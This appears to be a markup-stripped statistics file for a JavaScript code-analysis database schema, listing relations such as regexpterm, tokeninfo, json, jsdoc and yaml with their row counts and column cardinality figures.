+ + +indentDepth +indentChar + + +12 + + +1 +2 +62 + + +2 +3 +10 + + + + + + + + +js_parse_errors +3 + + +id +3 + + +toplevel +3 + + +message +1 + + +line +3 + + + + +id +toplevel + + +12 + + +1 +2 +3 + + + + + + +id +message + + +12 + + +1 +2 +3 + + + + + + +id +line + + +12 + + +1 +2 +3 + + + + + + +toplevel +id + + +12 + + +1 +2 +3 + + + + + + +toplevel +message + + +12 + + +1 +2 +3 + + + + + + +toplevel +line + + +12 + + +1 +2 +3 + + + + + + +message +id + + +12 + + +3 +4 +1 + + + + + + +message +toplevel + + +12 + + +3 +4 +1 + + + + + + +message +line + + +12 + + +3 +4 +1 + + + + + + +line +id + + +12 + + +1 +2 +3 + + + + + + +line +toplevel + + +12 + + +1 +2 +3 + + + + + + +line +message + + +12 + + +1 +2 +3 + + + + + + + + +regexpterm +id +33197 + + +id +33197 + + +kind +25 + + +parent +13313 + + +idx +76 + + +tostring +4610 + + + + +id +kind + + +12 + + +1 +2 +33197 + + + + + + +id +parent + + +12 + + +1 +2 +33197 + + + + + + +id +idx + + +12 + + +1 +2 +33197 + + + + + + +id +tostring + + +12 + + +1 +2 +33197 + + + + + + +kind +id + + +12 + + +1 +4 +2 + + +7 +12 +2 + + +12 +16 +2 + + +59 +100 +2 + + +146 +265 +2 + + +445 +479 +2 + + +599 +620 +2 + + +637 +642 +2 + + +826 +1058 +2 + + +1067 +1474 +2 + + +1573 +1693 +2 + + +2613 +3372 +2 + + +15489 +15490 +1 + + + + + + +kind +parent + + +12 + + +1 +4 +2 + + +7 +8 +1 + + +11 +12 +2 + + +15 +46 +2 + + +79 +132 +2 + + +132 +331 +2 + + +367 +381 +2 + + +437 +638 +2 + + +641 +737 +2 + + +825 +1005 +2 + + +1391 +1403 +2 + + +1465 +1645 +2 + + +2691 +3963 +2 + + + + + + +kind +idx + + +12 + + +1 +2 +2 + + +2 +3 +2 + + +4 +5 +3 + + +6 +8 +2 + + +12 +15 +2 + + +17 +19 +2 + + +19 +21 +2 + + +22 +23 +1 + + +23 +24 +2 + + +25 +27 +2 + + +27 +30 +2 + + +42 +49 +2 + + +73 +74 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +6 + + +2 +5 +2 + + +6 +11 +2 + + +13 +28 +2 + + +31 +59 +2 + + +65 +78 +2 + + +100 +118 +2 + + +149 +171 +2 + + +175 +391 +2 + + +433 +791 +2 + + +1992 +1993 +1 + + + + + + +parent +id + + +12 + + +1 
+2 +7691 + + +2 +3 +2568 + + +3 +4 +924 + + +4 +7 +1189 + + +7 +77 +941 + + + + + + +parent +kind + + +12 + + +1 +2 +10080 + + +2 +3 +2026 + + +3 +5 +1068 + + +5 +9 +139 + + + + + + +parent +idx + + +12 + + +1 +2 +7691 + + +2 +3 +2568 + + +3 +4 +924 + + +4 +7 +1189 + + +7 +77 +941 + + + + + + +parent +tostring + + +12 + + +1 +2 +7733 + + +2 +3 +2644 + + +3 +4 +940 + + +4 +7 +1230 + + +7 +32 +766 + + + + + + +idx +id + + +12 + + +1 +2 +7 + + +2 +3 +9 + + +4 +8 +7 + + +8 +13 +7 + + +15 +22 +6 + + +26 +35 +5 + + +37 +51 +6 + + +53 +75 +6 + + +79 +141 +6 + + +186 +325 +6 + + +385 +1182 +6 + + +1578 +13314 +5 + + + + + + +idx +kind + + +12 + + +1 +2 +18 + + +2 +3 +15 + + +3 +4 +8 + + +4 +5 +7 + + +5 +8 +6 + + +9 +13 +6 + + +13 +16 +7 + + +17 +20 +7 + + +21 +25 +2 + + + + + + +idx +parent + + +12 + + +1 +2 +7 + + +2 +3 +9 + + +4 +8 +7 + + +8 +13 +7 + + +15 +22 +6 + + +26 +35 +5 + + +37 +51 +6 + + +53 +75 +6 + + +79 +141 +6 + + +186 +325 +6 + + +385 +1182 +6 + + +1578 +13314 +5 + + + + + + +idx +tostring + + +12 + + +1 +2 +8 + + +2 +3 +8 + + +3 +4 +4 + + +5 +7 +6 + + +7 +10 +6 + + +10 +15 +6 + + +16 +21 +7 + + +21 +26 +6 + + +29 +48 +6 + + +48 +75 +6 + + +82 +147 +6 + + +158 +940 +6 + + +3258 +3259 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +3026 + + +2 +3 +751 + + +3 +5 +391 + + +5 +49 +346 + + +49 +1013 +96 + + + + + + +tostring +kind + + +12 + + +1 +2 +4605 + + +2 +3 +5 + + + + + + +tostring +parent + + +12 + + +1 +2 +3041 + + +2 +3 +746 + + +3 +5 +389 + + +5 +53 +346 + + +54 +875 +88 + + + + + + +tostring +idx + + +12 + + +1 +2 +4102 + + +2 +5 +351 + + +5 +58 +157 + + + + + + + + +regexp_parse_errors +id +122 + + +id +122 + + +regexp +41 + + +message +5 + + + + +id +regexp + + +12 + + +1 +2 +122 + + + + + + +id +message + + +12 + + +1 +2 +122 + + + + + + +regexp +id + + +12 + + +1 +2 +7 + + +2 +3 +9 + + +3 +4 +12 + + +4 +5 +5 + + +5 +6 +7 + + +6 +7 +1 + + + + + + +regexp +message + + +12 + + +1 +2 +18 + + +2 +3 +4 + + +3 +4 +19 + + + + + + +message +id + + +12 + + 
+1 +2 +1 + + +8 +9 +1 + + +22 +23 +1 + + +23 +24 +1 + + +68 +69 +1 + + + + + + +message +regexp + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +22 +23 +1 + + +23 +24 +1 + + +35 +36 +1 + + + + + + + + +is_greedy +2629 + + +id +2629 + + + + + +isOptionalChaining +100 + + +id +100 + + + + + + +range_quantifier_lower_bound +146 + + +id +146 + + +lo +11 + + + + +id +lo + + +12 + + +1 +2 +146 + + + + + + +lo +id + + +12 + + +1 +2 +4 + + +4 +5 +1 + + +5 +6 +1 + + +17 +18 +1 + + +20 +21 +1 + + +28 +29 +1 + + +33 +34 +1 + + +35 +36 +1 + + + + + + + + +range_quantifier_upper_bound +45 + + +id +45 + + +hi +13 + + + + +id +hi + + +12 + + +1 +2 +45 + + + + + + +hi +id + + +12 + + +1 +2 +5 + + +2 +3 +3 + + +3 +4 +2 + + +8 +9 +1 + + +9 +10 +1 + + +11 +12 +1 + + + + + + + + +is_capture +1280 + + +id +1280 + + +number +14 + + + + +id +number + + +12 + + +1 +2 +1280 + + + + + + +number +id + + +12 + + +1 +2 +1 + + +2 +3 +2 + + +4 +5 +2 + + +6 +7 +2 + + +7 +8 +1 + + +12 +13 +1 + + +23 +24 +1 + + +55 +56 +1 + + +108 +109 +1 + + +276 +277 +1 + + +774 +775 +1 + + + + + + + + +is_named_capture +1280 + + +id +1280 + + +name +14 + + + + +id +name + + +12 + + +1 +2 +1280 + + + + + + +name +id + + +12 + + +1 +2 +1 + + +2 +3 +2 + + +4 +5 +2 + + +6 +7 +2 + + +7 +8 +1 + + +12 +13 +1 + + +23 +24 +1 + + +55 +56 +1 + + +108 +109 +1 + + +276 +277 +1 + + +774 +775 +1 + + + + + + + + +is_inverted +458 + + +id +458 + + + + + +regexp_const_value +19032 + + +id +19032 + + +value +237 + + + + +id +value + + +12 + + +1 +2 +19032 + + + + + + +value +id + + +12 + + +1 +2 +80 + + +2 +3 +12 + + +3 +4 +10 + + +4 +5 +20 + + +5 +17 +18 + + +17 +30 +18 + + +30 +66 +18 + + +68 +143 +18 + + +155 +242 +18 + + +251 +555 +18 + + +581 +1013 +7 + + + + + + + + +char_class_escape +1573 + + +id +1573 + + +value +6 + + + + +id +value + + +12 + + +1 +2 +1573 + + + + + + +value +id + + +12 + + +11 +12 +1 + + +14 +15 +1 + + +92 +93 +1 + + +199 +200 +1 + + +378 +379 +1 + + +879 +880 +1 + + + + + + + + +unicode_property_escapename +1573 
+ + +id +1573 + + +name +6 + + + + +id +name + + +12 + + +1 +2 +1573 + + + + + + +name +id + + +12 + + +11 +12 +1 + + +14 +15 +1 + + +92 +93 +1 + + +199 +200 +1 + + +378 +379 +1 + + +879 +880 +1 + + + + + + + + +unicode_property_escapevalue +1573 + + +id +1573 + + +value +6 + + + + +id +value + + +12 + + +1 +2 +1573 + + + + + + +value +id + + +12 + + +11 +12 +1 + + +14 +15 +1 + + +92 +93 +1 + + +199 +200 +1 + + +378 +379 +1 + + +879 +880 +1 + + + + + + + + +backref +11 + + +id +11 + + +value +4 + + + + +id +value + + +12 + + +1 +2 +11 + + + + + + +value +id + + +12 + + +1 +2 +2 + + +3 +4 +1 + + +6 +7 +1 + + + + + + + + +named_backref +11 + + +id +11 + + +name +4 + + + + +id +name + + +12 + + +1 +2 +11 + + + + + + +name +id + + +12 + + +1 +2 +2 + + +3 +4 +1 + + +6 +7 +1 + + + + + + + + +tokeninfo +id +8770869 + + +id +8770869 + + +kind +9 + + +toplevel +5312 + + +idx +1581031 + + +value +234179 + + + + +id +kind + + +12 + + +1 +2 +8770869 + + + + + + +id +toplevel + + +12 + + +1 +2 +8770869 + + + + + + +id +idx + + +12 + + +1 +2 +8770869 + + + + + + +id +value + + +12 + + +1 +2 +8770869 + + + + + + +kind +id + + +12 + + +2773 +2774 +1 + + +5312 +5313 +1 + + +15526 +15527 +1 + + +31654 +31655 +1 + + +269555 +269556 +1 + + +551767 +551768 +1 + + +557620 +557621 +1 + + +2268328 +2268329 +1 + + +5068334 +5068335 +1 + + + + + + +kind +toplevel + + +12 + + +471 +472 +1 + + +2204 +2205 +1 + + +2851 +2852 +1 + + +3204 +3205 +1 + + +5089 +5090 +1 + + +5219 +5220 +1 + + +5294 +5295 +1 + + +5300 +5301 +1 + + +5312 +5313 +1 + + + + + + +kind +idx + + +12 + + +1949 +1950 +1 + + +2130 +2131 +1 + + +8409 +8410 +1 + + +12883 +12884 +1 + + +51181 +51182 +1 + + +130388 +130389 +1 + + +409369 +409370 +1 + + +583910 +583911 +1 + + +1104589 +1104590 +1 + + + + + + +kind +value + + +12 + + +1 +2 +2 + + +2 +3 +1 + + +34 +35 +1 + + +52 +53 +1 + + +1596 +1597 +1 + + +59827 +59828 +1 + + +85214 +85215 +1 + + +87463 +87464 +1 + + + + + + +toplevel +id + + +12 + + +1 +45 +403 + + +45 +95 +408 
+ + +95 +149 +399 + + +149 +212 +408 + + +212 +291 +405 + + +291 +362 +399 + + +362 +461 +401 + + +461 +585 +399 + + +585 +756 +399 + + +756 +1013 +399 + + +1013 +1389 +399 + + +1389 +2313 +400 + + +2320 +6681 +399 + + +6717 +1581032 +94 + + + + + + +toplevel +kind + + +12 + + +1 +5 +174 + + +5 +6 +1046 + + +6 +7 +1326 + + +7 +8 +1279 + + +8 +9 +1214 + + +9 +10 +273 + + + + + + +toplevel +idx + + +12 + + +1 +45 +403 + + +45 +95 +408 + + +95 +149 +399 + + +149 +212 +408 + + +212 +291 +405 + + +291 +362 +399 + + +362 +461 +401 + + +461 +585 +399 + + +585 +756 +399 + + +756 +1013 +399 + + +1013 +1389 +399 + + +1389 +2313 +400 + + +2320 +6681 +399 + + +6717 +1581032 +94 + + + + + + +toplevel +value + + +12 + + +1 +21 +423 + + +21 +33 +416 + + +33 +44 +424 + + +44 +55 +400 + + +55 +65 +426 + + +65 +76 +407 + + +76 +88 +426 + + +88 +102 +402 + + +102 +120 +405 + + +120 +144 +401 + + +144 +180 +400 + + +180 +260 +400 + + +260 +46630 +382 + + + + + + +idx +id + + +12 + + +1 +2 +1083847 + + +2 +3 +166188 + + +3 +6 +136823 + + +6 +9 +123495 + + +9 +5313 +70678 + + + + + + +idx +kind + + +12 + + +1 +2 +1175018 + + +2 +3 +207984 + + +3 +4 +120754 + + +4 +10 +77275 + + + + + + +idx +toplevel + + +12 + + +1 +2 +1083847 + + +2 +3 +166188 + + +3 +6 +136823 + + +6 +9 +123495 + + +9 +5313 +70678 + + + + + + +idx +value + + +12 + + +1 +2 +1089271 + + +2 +3 +165753 + + +3 +5 +104658 + + +5 +8 +145624 + + +8 +1449 +75725 + + + + + + +value +id + + +12 + + +1 +2 +104636 + + +2 +3 +47235 + + +3 +4 +20077 + + +4 +5 +16835 + + +5 +9 +19608 + + +9 +34 +17687 + + +34 +789848 +8101 + + + + + + +value +kind + + +12 + + +1 +2 +234168 + + +2 +3 +11 + + + + + + +value +toplevel + + +12 + + +1 +2 +174552 + + +2 +3 +34819 + + +3 +8 +18537 + + +8 +5313 +6271 + + + + + + +value +idx + + +12 + + +1 +2 +105969 + + +2 +3 +47057 + + +3 +4 +19986 + + +4 +5 +16682 + + +5 +9 +19402 + + +9 +36 +17686 + + +36 +347359 +7397 + + + + + + + + +next_token +104943 + + +comment +104943 + + +token +74457 + + + + 
+comment +token + + +12 + + +1 +2 +104943 + + + + + + +token +comment + + +12 + + +1 +2 +59983 + + +2 +3 +8628 + + +3 +12 +5601 + + +12 +141 +245 + + + + + + + + +json +id +1643352 + + +id +1643352 + + +kind +6 + + +parent +617634 + + +idx +159429 + + +tostring +768907 + + + + +id +kind + + +12 + + +1 +2 +1643352 + + + + + + +id +parent + + +12 + + +1 +2 +1643352 + + + + + + +id +idx + + +12 + + +1 +2 +1643352 + + + + + + +id +tostring + + +12 + + +1 +2 +1643352 + + + + + + +kind +id + + +12 + + +24 +25 +1 + + +654 +655 +1 + + +175925 +175926 +1 + + +273113 +273114 +1 + + +441281 +441282 +1 + + +752355 +752356 +1 + + + + + + +kind +parent + + +12 + + +17 +18 +1 + + +411 +412 +1 + + +165183 +165184 +1 + + +167132 +167133 +1 + + +271547 +271548 +1 + + +452264 +452265 +1 + + + + + + +kind +idx + + +12 + + +10 +11 +1 + + +65 +66 +1 + + +152 +153 +1 + + +174 +175 +1 + + +198 +199 +1 + + +159429 +159430 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +1 + + +2 +3 +1 + + +2865 +2866 +1 + + +100735 +100736 +1 + + +271467 +271468 +1 + + +393837 +393838 +1 + + + + + + +parent +id + + +12 + + +1 +2 +127476 + + +2 +3 +184044 + + +3 +4 +285109 + + +4 +159430 +21005 + + + + + + +parent +kind + + +12 + + +1 +2 +179808 + + +2 +3 +437119 + + +3 +7 +707 + + + + + + +parent +idx + + +12 + + +1 +2 +127476 + + +2 +3 +184044 + + +3 +4 +285109 + + +4 +159430 +21005 + + + + + + +parent +tostring + + +12 + + +1 +2 +173483 + + +2 +3 +197229 + + +3 +4 +240036 + + +4 +135127 +6886 + + + + + + +idx +id + + +12 + + +1 +2 +158929 + + +3 +617635 +500 + + + + + + +idx +kind + + +12 + + +1 +2 +159178 + + +2 +7 +251 + + + + + + +idx +parent + + +12 + + +1 +2 +158929 + + +3 +617635 +500 + + + + + + +idx +tostring + + +12 + + +1 +2 +158929 + + +2 +429145 +500 + + + + + + +tostring +id + + +12 + + +1 +2 +511110 + + +2 +3 +165121 + + +3 +6 +69702 + + +6 +63547 +22974 + + + + + + +tostring +kind + + +12 + + +1 +2 +768907 + + + + + + +tostring +parent + + +12 + + +1 +2 +562365 + + +2 +3 +144455 + + +3 
+10 +58431 + + +10 +63547 +3656 + + + + + + +tostring +idx + + +12 + + +1 +2 +554379 + + +2 +3 +185366 + + +3 +720 +29162 + + + + + + + + +json_literals +1026146 + + +value +397229 + + +raw +397431 + + +expr +1026146 + + + + +value +raw + + +12 + + +1 +2 +397027 + + +2 +3 +202 + + + + + + +value +expr + + +12 + + +1 +2 +216149 + + +2 +3 +128106 + + +3 +5 +28217 + + +5 +63547 +24757 + + + + + + +raw +value + + +12 + + +1 +2 +397431 + + + + + + +raw +expr + + +12 + + +1 +2 +216237 + + +2 +3 +128277 + + +3 +5 +28205 + + +5 +63547 +24712 + + + + + + +expr +value + + +12 + + +1 +2 +1026146 + + + + + + +expr +raw + + +12 + + +1 +2 +1026146 + + + + + + + + +json_properties +1186648 + + +obj +441238 + + +property +2285 + + +value +1186648 + + + + +obj +property + + +12 + + +1 +2 +685 + + +2 +3 +161803 + + +3 +4 +272428 + + +4 +252 +6322 + + + + + + +obj +value + + +12 + + +1 +2 +685 + + +2 +3 +161803 + + +3 +4 +272428 + + +4 +252 +6322 + + + + + + +property +obj + + +12 + + +1 +2 +1378 + + +2 +3 +371 + + +3 +4 +199 + + +4 +17 +174 + + +18 +429290 +163 + + + + + + +property +value + + +12 + + +1 +2 +1378 + + +2 +3 +371 + + +3 +4 +199 + + +4 +17 +174 + + +18 +429290 +163 + + + + + + +value +obj + + +12 + + +1 +2 +1186648 + + + + + + +value +property + + +12 + + +1 +2 +1186648 + + + + + + + + +json_errors +id +1 + + +id +1 + + +message +1 + + + + +id +message + + +12 + + +1 +2 +1 + + + + + + +message +id + + +12 + + +1 +2 +1 + + + + + + + + +json_locations +712 + + +locatable +712 + + +location +712 + + + + +locatable +location + + +12 + + +1 +2 +712 + + + + + + +location +locatable + + +12 + + +1 +2 +712 + + + + + + + + +hasLocation +19213780 + + +locatable +19213780 + + +location +15664049 + + + + +locatable +location + + +12 + + +1 +2 +19213780 + + + + + + +location +locatable + + +12 + + +1 +2 +12144311 + + +2 +3 +3490097 + + +3 +6 +29641 + + + + + + + + +entry_cfg_node +id +121542 + + +id +121542 + + +container +121542 + + + + +id +container + + +12 + + +1 +2 +121542 + + 
+ + + + +container +id + + +12 + + +1 +2 +121542 + + + + + + + + +exit_cfg_node +id +121542 + + +id +121542 + + +container +121542 + + + + +id +container + + +12 + + +1 +2 +121542 + + + + + + +container +id + + +12 + + +1 +2 +121542 + + + + + + + + +guard_node +177785 + + +id +177785 + + +kind +2 + + +test +91338 + + + + +id +kind + + +12 + + +1 +2 +177785 + + + + + + +id +test + + +12 + + +1 +2 +177785 + + + + + + +kind +id + + +12 + + +86336 +86337 +1 + + +91449 +91450 +1 + + + + + + +kind +test + + +12 + + +82430 +82431 +1 + + +89999 +90000 +1 + + + + + + +test +id + + +12 + + +1 +2 +10245 + + +2 +3 +76994 + + +3 +21 +4099 + + + + + + +test +kind + + +12 + + +1 +2 +10247 + + +2 +3 +81091 + + + + + + + + +successor +6873752 + + +pred +6717415 + + +succ +6718602 + + + + +pred +succ + + +12 + + +1 +2 +6588118 + + +2 +21 +129297 + + + + + + +succ +pred + + +12 + + +1 +2 +6617438 + + +2 +253 +101164 + + + + + + + + +jsdoc +id +19270 + + +id +19270 + + +description +9383 + + +comment +19270 + + + + +id +description + + +12 + + +1 +2 +19270 + + + + + + +id +comment + + +12 + + +1 +2 +19270 + + + + + + +description +id + + +12 + + +1 +2 +7588 + + +2 +3 +1387 + + +3 +5727 +408 + + + + + + +description +comment + + +12 + + +1 +2 +7588 + + +2 +3 +1387 + + +3 +5727 +408 + + + + + + +comment +id + + +12 + + +1 +2 +19270 + + + + + + +comment +description + + +12 + + +1 +2 +19270 + + + + + + + + +jsdoc_tags +id +29323 + + +id +29323 + + +title +92 + + +parent +14226 + + +idx +66 + + +tostring +92 + + + + +id +title + + +12 + + +1 +2 +29323 + + + + + + +id +parent + + +12 + + +1 +2 +29323 + + + + + + +id +idx + + +12 + + +1 +2 +29323 + + + + + + +id +tostring + + +12 + + +1 +2 +29323 + + + + + + +title +id + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +5 +7 + + +5 +7 +8 + + +8 +12 +7 + + +13 +17 +7 + + +20 +35 +7 + + +40 +55 +7 + + +58 +111 +7 + + +114 +167 +8 + + +170 +331 +7 + + +587 +913 +7 + + +2221 +10284 +4 + + + + + + +title +parent + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 
+4 +5 + + +4 +6 +7 + + +6 +10 +8 + + +10 +16 +7 + + +16 +26 +7 + + +26 +36 +7 + + +38 +67 +7 + + +68 +111 +7 + + +137 +213 +7 + + +232 +702 +7 + + +870 +6020 +7 + + + + + + +title +idx + + +12 + + +1 +2 +35 + + +2 +3 +8 + + +3 +4 +7 + + +4 +5 +8 + + +5 +6 +8 + + +6 +7 +5 + + +7 +8 +4 + + +8 +10 +8 + + +10 +31 +7 + + +46 +59 +2 + + + + + + +title +tostring + + +12 + + +1 +2 +92 + + + + + + +parent +id + + +12 + + +1 +2 +6064 + + +2 +3 +4452 + + +3 +4 +2064 + + +4 +5 +913 + + +5 +67 +733 + + + + + + +parent +title + + +12 + + +1 +2 +6972 + + +2 +3 +4911 + + +3 +4 +1793 + + +4 +8 +550 + + + + + + +parent +idx + + +12 + + +1 +2 +6064 + + +2 +3 +4452 + + +3 +4 +2064 + + +4 +5 +913 + + +5 +67 +733 + + + + + + +parent +tostring + + +12 + + +1 +2 +6972 + + +2 +3 +4911 + + +3 +4 +1793 + + +4 +8 +550 + + + + + + +idx +id + + +12 + + +1 +2 +2 + + +2 +3 +29 + + +3 +4 +6 + + +4 +5 +5 + + +5 +6 +6 + + +7 +11 +5 + + +11 +53 +5 + + +89 +1647 +5 + + +3710 +14227 +3 + + + + + + +idx +title + + +12 + + +1 +2 +9 + + +2 +3 +31 + + +3 +4 +9 + + +4 +6 +6 + + +8 +21 +5 + + +29 +61 +5 + + +70 +71 +1 + + + + + + +idx +parent + + +12 + + +1 +2 +2 + + +2 +3 +29 + + +3 +4 +6 + + +4 +5 +5 + + +5 +6 +6 + + +7 +11 +5 + + +11 +53 +5 + + +89 +1647 +5 + + +3710 +14227 +3 + + + + + + +idx +tostring + + +12 + + +1 +2 +9 + + +2 +3 +31 + + +3 +4 +9 + + +4 +6 +6 + + +8 +21 +5 + + +29 +61 +5 + + +70 +71 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +5 +7 + + +5 +7 +8 + + +8 +12 +7 + + +13 +17 +7 + + +20 +35 +7 + + +40 +55 +7 + + +58 +111 +7 + + +114 +167 +8 + + +170 +331 +7 + + +587 +913 +7 + + +2221 +10284 +4 + + + + + + +tostring +title + + +12 + + +1 +2 +92 + + + + + + +tostring +parent + + +12 + + +1 +2 +11 + + +2 +3 +5 + + +3 +4 +5 + + +4 +6 +7 + + +6 +10 +8 + + +10 +16 +7 + + +16 +26 +7 + + +26 +36 +7 + + +38 +67 +7 + + +68 +111 +7 + + +137 +213 +7 + + +232 +702 +7 + + +870 +6020 +7 + + + + + + +tostring +idx + + +12 + + +1 +2 +35 + + +2 +3 +8 + + +3 +4 +7 + + +4 +5 +8 + + 
+5 +6 +8 + + +6 +7 +5 + + +7 +8 +4 + + +8 +10 +8 + + +10 +31 +7 + + +46 +59 +2 + + + + + + + + +jsdoc_tag_descriptions +13676 + + +tag +13676 + + +text +7866 + + + + +tag +text + + +12 + + +1 +2 +13676 + + + + + + +text +tag + + +12 + + +1 +2 +6089 + + +2 +3 +1025 + + +3 +8 +596 + + +8 +459 +156 + + + + + + + + +jsdoc_tag_names +11506 + + +tag +11506 + + +text +2647 + + + + +tag +text + + +12 + + +1 +2 +11506 + + + + + + +text +tag + + +12 + + +1 +2 +1398 + + +2 +3 +569 + + +3 +4 +201 + + +4 +7 +208 + + +7 +24 +200 + + +24 +498 +71 + + + + + + + + +jsdoc_type_exprs +id +22481 + + +id +22481 + + +kind +15 + + +parent +21039 + + +idx +17 + + +tostring +1447 + + + + +id +kind + + +12 + + +1 +2 +22481 + + + + + + +id +parent + + +12 + + +1 +2 +22481 + + + + + + +id +idx + + +12 + + +1 +2 +22481 + + + + + + +id +tostring + + +12 + + +1 +2 +22481 + + + + + + +kind +id + + +12 + + +8 +9 +1 + + +19 +20 +1 + + +27 +28 +1 + + +35 +36 +1 + + +55 +56 +1 + + +91 +92 +1 + + +287 +288 +1 + + +292 +293 +1 + + +303 +304 +1 + + +310 +311 +1 + + +316 +317 +1 + + +536 +537 +1 + + +668 +669 +1 + + +895 +896 +1 + + +18639 +18640 +1 + + + + + + +kind +parent + + +12 + + +8 +9 +1 + + +19 +20 +1 + + +23 +24 +1 + + +35 +36 +1 + + +55 +56 +1 + + +90 +91 +1 + + +287 +288 +2 + + +301 +302 +1 + + +310 +311 +1 + + +314 +315 +1 + + +524 +525 +1 + + +583 +584 +1 + + +890 +891 +1 + + +17717 +17718 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +3 + + +2 +3 +2 + + +3 +4 +5 + + +4 +5 +2 + + +5 +6 +1 + + +13 +14 +1 + + +16 +17 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +5 + + +5 +6 +1 + + +6 +7 +1 + + +51 +52 +1 + + +57 +58 +1 + + +86 +87 +1 + + +89 +90 +1 + + +104 +105 +1 + + +155 +156 +1 + + +194 +195 +1 + + +696 +697 +1 + + + + + + +parent +id + + +12 + + +1 +2 +19985 + + +2 +16 +1054 + + + + + + +parent +kind + + +12 + + +1 +2 +20644 + + +2 +4 +395 + + + + + + +parent +idx + + +12 + + +1 +2 +19985 + + +2 +16 +1054 + + + + + + +parent +tostring + + +12 + + +1 +2 +19997 + + +2 +7 +1042 + + + + + 
+ +idx +id + + +12 + + +2 +3 +1 + + +4 +5 +3 + + +6 +7 +4 + + +8 +9 +1 + + +11 +12 +1 + + +23 +24 +1 + + +32 +33 +1 + + +93 +94 +1 + + +165 +166 +1 + + +340 +341 +1 + + +750 +751 +1 + + +21021 +21022 +1 + + + + + + +idx +kind + + +12 + + +1 +2 +5 + + +2 +3 +7 + + +5 +6 +1 + + +6 +7 +1 + + +10 +11 +1 + + +11 +12 +1 + + +13 +14 +1 + + + + + + +idx +parent + + +12 + + +2 +3 +1 + + +4 +5 +3 + + +6 +7 +4 + + +8 +9 +1 + + +11 +12 +1 + + +23 +24 +1 + + +32 +33 +1 + + +93 +94 +1 + + +165 +166 +1 + + +340 +341 +1 + + +750 +751 +1 + + +21021 +21022 +1 + + + + + + +idx +tostring + + +12 + + +2 +3 +2 + + +3 +4 +3 + + +4 +5 +3 + + +5 +6 +1 + + +6 +7 +1 + + +11 +12 +1 + + +17 +18 +1 + + +21 +22 +1 + + +23 +24 +1 + + +42 +43 +1 + + +103 +104 +1 + + +1378 +1379 +1 + + + + + + +tostring +id + + +12 + + +1 +2 +713 + + +2 +3 +271 + + +3 +4 +105 + + +4 +6 +110 + + +6 +12 +111 + + +12 +77 +109 + + +77 +2754 +28 + + + + + + +tostring +kind + + +12 + + +1 +2 +1446 + + +2 +3 +1 + + + + + + +tostring +parent + + +12 + + +1 +2 +713 + + +2 +3 +271 + + +3 +4 +105 + + +4 +6 +110 + + +6 +12 +112 + + +12 +78 +110 + + +78 +2747 +26 + + + + + + +tostring +idx + + +12 + + +1 +2 +1356 + + +2 +15 +91 + + + + + + + + +jsdoc_record_field_name +241 + + +id +90 + + +idx +15 + + +name +123 + + + + +id +idx + + +12 + + +1 +2 +47 + + +2 +3 +19 + + +3 +4 +8 + + +4 +7 +8 + + +7 +16 +8 + + + + + + +id +name + + +12 + + +1 +2 +47 + + +2 +3 +19 + + +3 +4 +8 + + +4 +7 +8 + + +7 +16 +8 + + + + + + +idx +id + + +12 + + +2 +3 +1 + + +4 +5 +3 + + +6 +7 +4 + + +8 +9 +1 + + +10 +11 +1 + + +12 +13 +1 + + +16 +17 +1 + + +24 +25 +1 + + +43 +44 +1 + + +90 +91 +1 + + + + + + +idx +name + + +12 + + +2 +3 +1 + + +3 +4 +1 + + +4 +5 +2 + + +5 +6 +3 + + +6 +7 +1 + + +8 +9 +1 + + +10 +11 +1 + + +12 +13 +1 + + +13 +14 +1 + + +18 +19 +1 + + +29 +30 +1 + + +37 +38 +1 + + + + + + +name +id + + +12 + + +1 +2 +65 + + +2 +3 +40 + + +3 +4 +6 + + +4 +7 +10 + + +9 +25 +2 + + + + + + +name +idx + + +12 + + +1 +2 +87 + + +2 +3 +34 + + +3 +4 
+2 + + + + + + + + +jsdoc_prefix_qualifier +823 + + +id +823 + + + + + +jsdoc_has_new_parameter +22 + + +fn +22 + + + + + +jsdoc_errors +id +1658 + + +id +1658 + + +tag +1460 + + +message +203 + + +tostring +89 + + + + +id +tag + + +12 + + +1 +2 +1658 + + + + + + +id +message + + +12 + + +1 +2 +1658 + + + + + + +id +tostring + + +12 + + +1 +2 +1658 + + + + + + +tag +id + + +12 + + +1 +2 +1262 + + +2 +3 +198 + + + + + + +tag +message + + +12 + + +1 +2 +1262 + + +2 +3 +198 + + + + + + +tag +tostring + + +12 + + +1 +2 +1262 + + +2 +3 +198 + + + + + + +message +id + + +12 + + +1 +2 +144 + + +2 +3 +27 + + +3 +7 +16 + + +7 +347 +16 + + + + + + +message +tag + + +12 + + +1 +2 +144 + + +2 +3 +27 + + +3 +7 +16 + + +7 +347 +16 + + + + + + +message +tostring + + +12 + + +1 +2 +203 + + + + + + +tostring +id + + +12 + + +1 +2 +48 + + +2 +3 +10 + + +3 +4 +3 + + +4 +5 +6 + + +5 +8 +7 + + +11 +27 +7 + + +34 +347 +7 + + +477 +478 +1 + + + + + + +tostring +tag + + +12 + + +1 +2 +48 + + +2 +3 +10 + + +3 +4 +3 + + +4 +5 +6 + + +5 +8 +7 + + +11 +27 +7 + + +34 +347 +7 + + +477 +478 +1 + + + + + + +tostring +message + + +12 + + +1 +2 +66 + + +2 +3 +6 + + +3 +4 +3 + + +4 +7 +7 + + +8 +25 +7 + + + + + + + + +yaml +id +885 + + +id +885 + + +kind +4 + + +parent +204 + + +idx +25 + + +tag +8 + + +tostring +318 + + + + +id +kind + + +12 + + +1 +2 +885 + + + + + + +id +parent + + +12 + + +1 +2 +885 + + + + + + +id +idx + + +12 + + +1 +2 +885 + + + + + + +id +tag + + +12 + + +1 +2 +885 + + + + + + +id +tostring + + +12 + + +1 +2 +885 + + + + + + +kind +id + + +12 + + +1 +2 +1 + + +35 +36 +1 + + +149 +150 +1 + + +700 +701 +1 + + + + + + +kind +parent + + +12 + + +1 +2 +1 + + +33 +34 +1 + + +90 +91 +1 + + +183 +184 +1 + + + + + + +kind +idx + + +12 + + +1 +2 +1 + + +7 +8 +1 + + +11 +12 +1 + + +25 +26 +1 + + + + + + +kind +tag + + +12 + + +1 +2 +3 + + +5 +6 +1 + + + + + + +kind +tostring + + +12 + + +1 +2 +1 + + +10 +11 +1 + + +67 +68 +1 + + +240 +241 